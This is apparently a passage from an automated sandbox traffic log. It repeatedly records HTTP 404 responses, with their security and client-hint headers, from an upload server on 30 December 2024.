Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6cTKeBhd9_cqhYEFdMDgw5qRBPLeq9PWal5o59KpjaqfrfAIZww9YLMf4kMiWqHhRu11u7S4wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:35:58 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-1m8rdPMaTKKGJ7II6kDjSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6SlA2lyzGQMKbOPiXdY9eW7qpoQERr3DyZzAzAg7JDObw09FS1FbuyzIDBCw4QvbtRVwIp1lgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:35:58 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-NSbjd6pOiKL5mYOq3LMq0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7nkfrw4zWMcA96Tm2wzc5eGnCtNu3sZ16X4Bd1ZXt9Gl4jIokiEUhGHFsdcrp95CJyfk2zrwQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:00 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wIJHgNbWZcjf-u2dXguz-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6AF2rbA8qRyXniCRcfQxq8LortFxpl5AlxvpxaR9J4fezOD7GC1KRpem5RxEwDlQV6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:01 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-iyuykCa006bVWdFpk8ae4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC69YjcDJuuU8XKAgOHzCeMMuLA1mPS4ll3Cwa_S-PSxqmPUL8gQEevowSyP5qbj3w_HContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:01 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-BY7XwNwPutxwVpZNLu7yQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4SZkjsDejK4sGklkzysjFwPTw619WETp2riREnNCpzhuV6sGQ2pnoAEf48Ldojfk-oj_M534gContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:02 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4WUBvEgZPEYkbPyfcWUU7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4IOpqcoUwQYlR2jhkdNI5F_dXjfkV-KiFQmwfthSeR1SGdFk0kcgo6I8AG5IRcFXBbContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:03 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-lyRGvNgpAlMTWpIKsVRDqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ab4B4VViXexZXnNIsrUYjghqUgJysFZub8TKu0p9qi4tktUvGGypHgQu0w_TqLo5SAO61pHAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:04 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-YS8uuDpt5RQfQi7mOTB4oA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC702cmuWsXn2m-dcu-WukJu6RTvwK88Zc9rHS1y_V4ytGd7RgO_XJ3ZZAyvSjQt5l3FF3UEKuQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:05 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-fZakuaf-B8iCvLRPeDu3_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5oi5i29iQP001zNMF8CXNgMksE1eZEDcQyAhToSbQErtFJU-V39lo7qwcb0NUnk981Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:05 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-PX9-0Bm7Z8f5iqwOWYPEjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5iASZcT6NwIC-1CiQ2AmelYITs748FqaQubbLNhz21R-_TSTIAEhPLV3Dm57pjihAVscr9Z-YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:06 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-fMVZVNUnRG_TL-jE0oFsvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6w8KiNPAM8NnUbhRWts8zZTuJ4rdRzjNdRbm9PtjwyvUyXjYsURrF5VevbdMJVdGiIPlupnG4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:06 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-YWxHEBQjzh8qnrkm9ylnng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC46MJxyTvNUmJpxkJYxaC4HQQmXrfblIoYxBYqYLOhv8qWyZ2Xa8KFZ8rY-YJOG_D7DContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:07 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-PulQbfjACG-CGBvQVBi9Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC50WrBUvVBT8TPpLFG7tq1KQB8jI9w5J3rv08P04xSRLp_wjl39Pv_HGMioXQZnoGNLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:07 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0AZLRlIJ7QpzOh01IAIO5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4-ILUznPsxscn6A_BvndyEMB5wL-LjkUSqkN8xkao-w5mg3jMATOekOjuJvjneUkwcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:08 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-bSWHPYHT7FsELXaRu34HKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4rmfEY4Ike4b-cNVQpbOMTT7mXzYPfunRfmn0WirMXH8dWQ6GfRhHKCkeOnOqnc78k5wVs3X4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:09 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-fGmiZ8GbVL8ptBSV4DmuJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC42b2AxuBfNaZkuZYzUo4NjnozgisAXBuyrU-KcnxmU1R8rKZ3s6Sme1NwcfvzTYTRGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:09 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-eDPxUEMdja1HvDb91tBawA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6fgbHQUxNcXJy246NXrNnAPRoUWAuorDDX9rRnKvzjp0-bhNEJeVhmBv7BuZZ1DwBoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:10 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-l6RzfsO5Iu364I2j4ZIaUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5_NNTtI3YhGoiDZJTFh_92X5goal0xhS7kT4-KlQqluZOqdhLIa9-1xBKSI5bR2Up5yYeRo_UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:10 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-323h0RAvFX0bKGa9nhr74g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4BwraRNqiugcSFNF06yOTy7hO2eUWRwqsyF0udZMujQCWuw-C_oZSGQp6QyE2ZKydMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:13 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-52wsimOwzsfLXqV6pyq5mQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
